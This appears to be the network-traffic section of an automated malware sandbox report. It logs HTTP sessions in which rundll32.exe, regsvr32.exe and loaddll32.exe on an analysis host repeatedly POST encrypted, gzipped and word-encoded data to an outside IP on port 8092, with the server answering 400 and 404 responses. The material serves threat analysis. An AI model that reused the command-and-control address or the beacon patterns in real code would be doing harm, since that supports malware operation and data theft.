                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.449744203.204.217.19080927472C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.683161974 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.449747203.204.217.19080927480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697854996 CEST866OUTPOST /oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&yi=670f86726 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 532
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 63 63 66 36 65 33 61 33 38 65 62 31 35 62 61 35 34 35 66 64 37 30 66 34 63 38 66 63 37 63 62 63 36 35 63 35 30 38 61 65 34 37 38 30 65 36 31 62 30 65 33 33 33 64 37 38 64 66 66 35 61 39 36 32 36 34 37 38 36 31 37 34 37 36 36 36 36 63 34 66 36 38 35 61 37 39 36 36 35 34 34 63 35 38 36 34 36 63 36 66 33 39 33 33 35 32 37 61 35 37 36 33 34 63 36 61 34 36 33 31 37 61 36 38 33 35 33 36 34 62 32 66 33 30 36 61 33 34 35 34 36 64 36 32 37 32 36 63 36 37 30 61 34 31 36 65 36 61 36 62 37 35 34 39 36 64 35 61 32 62 34 35 35 39 34 38 34 63 36 32 36 33 35 37 34 37 36 61 35 38 34 33 37 39 33 35 33 39 35 35 37 30 37 34 33 36 35 31 32 62 36 62 35 38 37 32 35 32 37 39 34 65 36 62 36 32 37 61 36 31 33 35 32 62 34 64 35 35 30 61 32 64 32 64 32 64 32 30 35 38 34 38 36 64 33 33 35 30 37 38 37 31 34 39 35 38 33 35 32 66 36 63 37 37 37 61 36 62 37 35 34 35 36 66 36 61 36 37 33 39 34 66 35 38 37 61 36 31 34 32 33 35 37 31 34 37 33 33 36 39 35 39 35 31 36 63 35 34 33 34 34 39 35 34 33 38 37 34 33 33 37 35 33 34 30 61 33 64 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: ccf6e3a38eb15ba545fd70f4c8fc7cbc65c508ae4780e61b0e333d78dff5a9626478617476666c4f685a7966544c58646c6f3933527a57634c6a46317a6835364b2f306a34546d62726c670a416e6a6b75496d5a2b4559484c626357476a584379353955707436512b6b587252794e6b627a61352b4d550a2d2d2d2058486d335078714958352f6c777a6b75456f6a67394f587a6142357147336959516c5434495438743375340a3d3d89d6f2ed7b5484c1858ed591631fc7325e8a82538758e0457078c10a90a716760830108ee28dd178b1652ded175e181cc626017cb9b9ec0eeaecf1b58fabf12494118a5956fca9b68fb6674eedf854190765e2733c70f63fd3f31b25e81331ba
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.674983025 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:30 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.449748203.204.217.19080927472C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707678080 CEST1527OUTPOST /namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=6708672y6 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 1196
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 64 96 6d 76 eb bc 0a 85 a7 c2 54 b0 84 2d 4e 90 d0 0b a8 b9 ce fc 07 72 17 49 eb a4 e7 fc e9 6a fd 41 d1 e6 61 6f 9b 56 1a 01 3c fe 50 09 d6 e1 d0 38 4a 6b 7c 23 83 4e 23 af 51 05 d3 45 0e db 8a 20 db 31 60 aa 4a 43 11 d8 34 4a 63 f2 80 d2 88 8c c7 01 82 41 f9 8e 07 61 dd d1 63 90 3b 39 34 a2 9a f7 43 2b 93 43 c7 d5 29 2c 7f fd 83 26 0e 2e c4 47 83 4a c8 06 0d 1f 98 cd 9c d5 d4 c9 c8 c1 88 fb b6 cc 09 a2 b1 2e c3 c2 e2 70 c7 20 db 45 b5 52 85 4a 1e c8 83 c7 01 3e f0 c6 72 e6 b3 e5 d6 08 f3 f6 43 55 f4 38 c1 c8 db da 77 c9 66 7c 89 d0 90 13 74 45 51 2c 8d 2a dc 68 db b2 ad a1 e3 10 cc ff 4d e8 54 61 33 1c 01 58 75 a6 2a ec 01 be b6 0d 9d 07 60 ed 1c 41 04 d3 cf d2 b2 b0 2c 0f c3 f8 b8 52 74 ec 64 a9 a9 7f 97 72 e1 72 fb 55 b0 53 34 ac 3a e0 46 a7 87 0e 02 c7 3e 1b 1b 01 a1 49 d5 ee 60 84 ee d4 37 49 4d d7 38 f4 8b 0c 2a d7 2a 64 0e 81 22 78 90 c3 1f 3d a7 4e 87 69 74 60 27 87 5d 1f e7 af 26 8c e8 0b 65 61 90 c3 9d 3d f6 25 39 2a 70 5d d1 ee e4 41 f6 7e 7b fe 94 39 2c d5 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: dmvT-NrIjAaoV<P8Jk|#N#QE 1`JC4JcAac;94C+C),&.GJ.p ERJ>rCU8wf|tEQ,*hMTa3Xu*`A,RtdrrUS4:F>I`7IM8**d"x=Nit`']&ea=%9*p]A~{9,|r6AUNP:grXUJ0L."zO`TDgr"C/wVv):x@#Cr8oX>rz7q@nV&U8]y!'t?8hq7F_dNo(,E'Lvs-m5w&b8UGpqBe9M7|KfKE^u+O;nBoQaFz1k<sL}P<h[yi<KR*Lrvnod(H6__xr`:/MO4*Gt~$'$.1E09yKzA<&;=[9M_1L*8|[|qIEtQCANJLO(}BXS(`IiZe6; 0uEm8F>.-'RcThjqx_j5MdA('x{6.+9pegh_TI;Zu@/Sk@::>`{%@37IwMVJm>2jvIv.<];St8WfS5h9d [TRUNCATED]
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.686956882 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:30 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    6192.168.2.449749203.204.217.19080927624C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.544504881 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    7192.168.2.449750203.204.217.19080927624C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.574444056 CEST837OUTPOST /namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 532
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 63 63 66 36 65 33 61 33 38 65 62 31 35 62 61 35 34 35 66 64 37 30 66 34 63 38 66 63 37 63 62 63 36 35 63 35 30 38 61 65 34 37 38 30 65 36 31 62 30 65 33 33 33 64 37 38 64 66 66 35 61 39 36 32 36 36 37 31 37 61 34 37 35 33 36 64 34 33 33 35 34 62 35 31 33 37 36 39 34 34 36 38 35 39 37 38 36 33 35 36 37 61 33 38 36 64 35 33 35 61 36 39 37 36 37 38 37 61 37 32 34 37 37 37 36 65 35 31 33 38 34 61 36 66 34 36 35 30 36 33 33 38 37 30 34 61 36 38 35 39 30 61 35 37 36 39 37 61 35 38 34 36 34 37 36 34 33 35 33 36 35 34 36 38 37 35 33 34 34 31 34 31 36 31 33 35 34 37 37 36 36 36 35 61 36 62 34 63 33 31 34 61 34 61 33 31 33 35 33 39 35 33 37 39 37 30 33 37 36 33 35 32 33 33 33 33 37 36 33 34 33 35 36 35 37 32 34 35 30 61 32 64 32 64 32 64 32 30 36 37 37 31 36 61 32 62 37 34 36 33 33 38 34 65 36 31 37 33 34 64 33 31 34 39 35 33 37 35 34 37 37 61 33 36 36 64 35 30 33 32 32 62 37 34 36 61 34 35 34 33 34 39 33 31 35 38 33 36 33 39 35 33 34 34 36 37 34 66 33 36 34 66 34 66 36 35 37 38 35 31 36 37 36 37 30 61 33 33 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: ccf6e3a38eb15ba545fd70f4c8fc7cbc65c508ae4780e61b0e333d78dff5a96266717a47536d43354b5137694468597863567a386d535a6976787a7247776e51384a6f46506338704a68590a57697a58464764353654687534414161354776665a6b4c314a4a31353953797037635233337634356572450a2d2d2d2067716a2b7463384e61734d31495375477a366d50322b746a454349315836395344674f364f4f65785167670a33e1afb03180f34e48e8802792e82857a72533a7f67e751d57f57ac459a00f174cfd19f5a5b86808e3516ea3c4f50762b4198ebd1f0eb196e22860f54adf4cc0fff05be95df8c92fe57c5c0fa363d74f6d228a7ccc6f16f83b6a913a66581bbe86d4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.552536011 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:33 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    8192.168.2.449751203.204.217.19080927664C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.231462955 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    9192.168.2.449752203.204.217.19080927664C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.249691010 CEST620OUTPOST /db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5628 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 294
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 49 68 2f 63 61 34 6e 4b 4e 70 4e 45 53 6d 78 35 4c 73 45 69 4a 45 30 71 56 6f 6f 65 51 2b 44 39 53 64 50 42 54 48 53 71 76 44 77 0a 62 55 69 4c 79 76 55 46 4a 47 66 33 4e 34 64 77 71 64 4a 73 46 30 65 32 58 51 6a 52 6f 31 75 36 58 67 39 32 30 52 75 55 4d 33 51 0a 2d 2d 2d 20 50 31 42 6e 72 69 53 67 43 76 66 42 64 68 51 7a 70 46 59 4c 39 44 7a 73 79 4e 53 39 47 71 32 36 6d 72 43 37 47 53 2f 5a 49 49 63 0a 0c fd 06 8e 4d bd 47 34 7e cc ac fb 08 dc 26 e1 d0 23 98 c3 58 0d 3b 34 1f e9 89 b4 4d 3a bd d0 8a d9 cb 27 29 63 99 f1 15 b5 f7 e4 b0 f7 41 25 b0 49 d8 1e 90 2e 2c bb 5e 91 77 4c 2b c4 e9 80 7d 6d 6a c7 eb fe b1 3d 8a 91 d7 01 58 20 b6 e8 63 16 06 19 e6 bb 73 b2 0b 1c 6a bc 5f 5c 34 34 2b 07 01 00 00 ff ff 84 1a 43 b3 0a 01 00 00
                                                                                                                                                                                                                    Data Ascii: [Ep|eG3=xbIh/ca4nKNpNESmx5LsEiJE0qVooeQ+D9SdPBTHSqvDwbUiLyvUFJGf3N4dwqdJsF0e2XQjRo1u6Xg920RuUM3Q--- P1BnriSgCvfBdhQzpFYL9DzsyNS9Gq26mrC7GS/ZIIcMG4~&#X;4M:')cA%I.,^wL+}mj=X csj_\44+C
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.235466957 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:36 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    10192.168.2.449753203.204.217.19080927336C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.321647882 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    11192.168.2.449754203.204.217.19080927336C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.342720032 CEST2849OUTPOST /oauth2/database/api/php/samples.html?d=71155844&og=18845628 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 2538
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 53 49 4d 4c 49 4e 20 4c 45 41 44 4d 45 4e 20 48 49 54 43 48 48 49 4b 45 52 20 4d 45 4e 54 49 4f 4e 45 44 20 52 4f 56 45 52 20 42 55 54 54 45 52 46 41 54 20 50 55 52 43 48 41 53 45 20 42 4f 54 43 48 49 45 53 54 20 43 48 45 45 52 49 4e 47 20 47 4f 4f 4d 42 41 48 20 43 52 4f 41 4b 20 4e 45 49 47 48 45 44 20 41 55 54 4f 52 4f 55 54 45 20 4b 45 43 4b 49 4e 47 20 4f 52 50 48 52 45 59 53 20 46 4f 4f 54 53 54 4f 43 4b 20 50 53 59 43 48 49 4e 47 20 43 49 4e 51 55 45 20 4d 45 4c 54 57 41 54 45 52 53 20 52 45 49 4d 42 55 52 53 45 20 54 48 49 4f 55 52 41 43 49 4c 53 20 47 45 4f 4d 41 47 4e 45 54 49 53 4d 20 44 45 53 54 41 49 4e 49 4e 47 20 51 55 49 4e 54 55 50 4c 45 54 20 54 48 49 43 4b 48 45 41 44 45 44 20 53 51 55 41 54 4c 59 20 48 45 4d 49 53 50 48 45 52 45 53 20 53 55 4c 4c 45 4e 4c 59 20 47 45 4e 54 41 4d 49 43 49 4e 20 4b 45 42 42 49 45 53 20 4e 4f 4e 47 4c 41 52 45 53 20 45 41 53 45 44 20 42 4c 55 45 43 41 50 53 20 4d 45 4c 54 41 47 45 53 20 5a 4f 4f 4c 4f 47 59 20 53 54 41 52 46 49 53 48 20 41 58 4f 4e [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: SIMLIN LEADMEN HITCHHIKER MENTIONED ROVER BUTTERFAT PURCHASE BOTCHIEST CHEERING GOOMBAH CROAK NEIGHED AUTOROUTE KECKING ORPHREYS FOOTSTOCK PSYCHING CINQUE MELTWATERS REIMBURSE THIOURACILS GEOMAGNETISM DESTAINING QUINTUPLET THICKHEADED SQUATLY HEMISPHERES SULLENLY GENTAMICIN KEBBIES NONGLARES EASED BLUECAPS MELTAGES ZOOLOGY STARFISH AXONOMETRIC ERASURES REVERSER EASED SAMPHIRE BRANT DEPRECIATOR CRAPOLAS CHEERING AXONOMETRIC EARLDOMS SALUTARY TERRENES ADMITTEE REEVALUATES UPSIZING SALUTARY EASED SOUTHWESTER THIOURACILS BEAMLESS DOUBLEHEADER BLUECAPS DEEDY NAZI SPIFF ARRANGED FOOLFISH SWEETIES SANDBARS JOYPOPS FROSTBIT SOPHISTICATEDLY REJUVENATOR METHADON SOUTHWESTER BALMINESSES NEUTRALNESS FATALISM AILERON NEUTRALNESS PATHWAYS EVINCING SOUTHWESTER DEPRECIATOR WISTFULNESS UPSIZING REJUVENATOR PULED SLICK ADMITTEE BUCKSHOT DRAFFIER JOYPOPS KEYSTONE FADEAWAY PACHALIC ROUGHNESSES ANTIMONY TALLAGES SUBROUTINES STARFISH BLUECAPS GREASEWOODS MEANINGS DEAIR AXONOMETRIC CHERNOZEMIC OUTBOAST ROUGHNESSES DEPLU [TRUNCATED]
                                                                                                                                                                                                                    Sep 27, 2024 11:20:39.312338114 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:20:39 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    12192.168.2.449761203.204.217.19080927488C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.785480022 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    13192.168.2.449763203.204.217.19080927488C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:33.804893970 CEST579OUTPOST /db/api.html?x=19440630&xj=33556174 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 294
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 6b 46 78 37 6a 67 32 55 75 48 6e 59 6b 74 37 44 49 50 54 44 74 38 2f 33 67 70 35 35 66 64 43 4e 34 75 6d 51 73 66 72 72 51 52 63 0a 38 4c 46 70 37 53 76 37 4a 48 30 65 62 4a 6c 74 5a 2b 4b 58 68 35 32 64 4e 37 36 5a 66 48 2f 44 47 68 49 51 74 44 4a 2f 35 66 73 0a 2d 2d 2d 20 7a 59 56 64 75 72 6f 57 6e 6d 66 41 6e 31 4b 45 2f 63 42 75 6b 6b 56 5a 73 38 73 31 53 68 4d 6c 71 37 6e 51 71 6a 69 70 34 71 34 0a f2 5d 70 36 87 6c 2b 29 e7 7e a0 6f 1d 7d 51 ee e0 ec e0 30 cc 43 c0 59 ff 61 ea 27 4a 25 69 44 dc 27 d1 05 ac 6a 5e 66 46 cd 69 f5 12 a5 bd 78 c8 b3 5f 61 c5 68 d2 68 70 88 69 23 89 22 65 8e 0c 09 b8 55 0d be 5a 5b 8b b7 3b 63 ae a9 d8 a1 91 c8 07 2e f2 44 cd 11 60 e9 bd d1 41 09 f2 e6 41 36 01 00 00 ff ff 52 e8 3d 75 0a 01 00 00
                                                                                                                                                                                                                    Data Ascii: [Ep|eG3=xbkFx7jg2UuHnYkt7DIPTDt8/3gp55fdCN4umQsfrrQRc8LFp7Sv7JH0ebJltZ+KXh52dN76ZfH/DGhIQtDJ/5fs--- zYVduroWnmfAn1KE/cBukkVZs8s1ShMlq7nQqjip4q4]p6l+)~o}Q0CYa'J%iD'j^fFix_ahhpi#"eUZ[;c.D`AA6R=u
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.754260063 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:34 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    14192.168.2.449762203.204.217.19080927480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.043689013 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    15192.168.2.449764203.204.217.19080927480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:34.061904907 CEST633OUTPOST /oauth/database/namespaces/database/api/db/database/register.html?c=21322866&wd=a33556174 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 294
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 58 53 36 63 48 6e 36 65 4b 45 5a 31 62 4f 2f 67 58 64 37 4f 42 62 6e 67 68 48 33 68 59 4f 46 36 61 74 6b 70 59 62 67 77 79 31 6f 0a 77 58 6f 39 57 44 49 65 30 48 41 58 71 49 6e 56 34 77 68 32 52 54 7a 4c 2b 6c 51 34 71 56 4e 33 4b 6d 65 78 6c 4e 2f 74 73 6e 30 0a 2d 2d 2d 20 7a 71 66 33 77 62 55 51 61 64 77 45 38 77 42 44 6f 44 46 51 36 42 2b 52 54 4d 69 39 49 65 79 4d 78 75 32 47 7a 56 56 6c 67 41 6f 0a 1b b3 6e ad 1f 06 ae 82 96 4d 22 75 ce 05 f5 62 9b 45 e3 80 af 10 66 26 f9 0c 44 ab 76 8c 13 d6 08 13 2e 81 a0 12 65 a0 8e 89 85 1f 4b 12 08 42 ec 5f c0 ac 73 8e 20 03 ae 8a ce ec 59 f2 c0 8f 12 66 5d 94 6f 4d 35 d8 5e f4 03 3d e6 4e ae f4 3a fb a8 76 44 f9 b1 d1 8b 65 e6 f7 71 0c 1f e1 91 77 01 00 00 ff ff 6e 7d 5f 10 0a 01 00 00
                                                                                                                                                                                                                    Data Ascii: [Ep|eG3=xbXS6cHn6eKEZ1bO/gXd7OBbnghH3hYOF6atkpYbgwy1owXo9WDIe0HAXqInV4wh2RTzL+lQ4qVN3KmexlN/tsn0--- zqf3wbUQadwE8wBDoDFQ6B+RTMi9IeyMxu2GzVVlgAonM"ubEf&Dv.eKB_s Yf]oM5^=N:vDeqwn}_
                                                                                                                                                                                                                    Sep 27, 2024 11:22:35.030294895 CEST82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 09:22:34 GMT
                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    16192.168.2.449765203.204.217.19080927472C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.083379030 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    17192.168.2.449767203.204.217.19080927472C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:36.107408047 CEST654OUTPOST /oauth2/oauth/db/api.html?_=36462oo14&ip=33556174 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 355
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                    Data Raw: 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 47 77 51 4f 34 7a 35 42 6a 6b 52 2d 2b 70 52 6f 76 6a 51 4f 30 5f 46 61 37 76 65 30 30 71 43 2d 38 78 34 36 75 6a 44 6f 44 72 50 36 4d 71 52 34 4a 6b 34 4c 2b 71 43 6b 53 62 34 48 53 75 43 30 38 77 46 36 6f 72 51 48 74 6e 73 34 52 76 43 5f 53 79 33 58 4a 70 35 79 68 72 51 48 46 6e 44 44 52 70 38 79 32 5f 35 75 74 6b 72 6e 4f 2d 52 48 2d 6f 43 6e 68 69 70 51 4c 66 64 2b 4a 2d 53 75 37 72 73 6f 76 2d 50 79 5f 71 52 79 4d 73 63 5f 39 70 74 42 4a 6a 71 75 38 75 38 4c 6d 78 46 30 52 72 34 34 4a 6f 53 36 72 76 38 52 47 6b 44 42 64 69 51 63 68 38 31 30 4d 59 63 6c 68 4c 4a 5a 59 52 33 48 71 42 66 37 42 64 56 63 4b 58 62 4a 56 38 79 35 63 50 38 6f 32 77 44 42 59 6c 7a 4c 79 2d 4a 6e 4c 37 59 76 50 37 73 39 38 34 75 54 36 6c 6d 55 70 45 7a 68 74 6f 75 51 41 2b 6d 62 36 77 68 43 62 33 79 34 75 78 4a 49 4c 71 69 5a 49 36 76 64 45 46 63 4a 72 30 5a 42 4f 4d 4d 47 6c 71 32 46 70 52 78 [TRUNCATED]
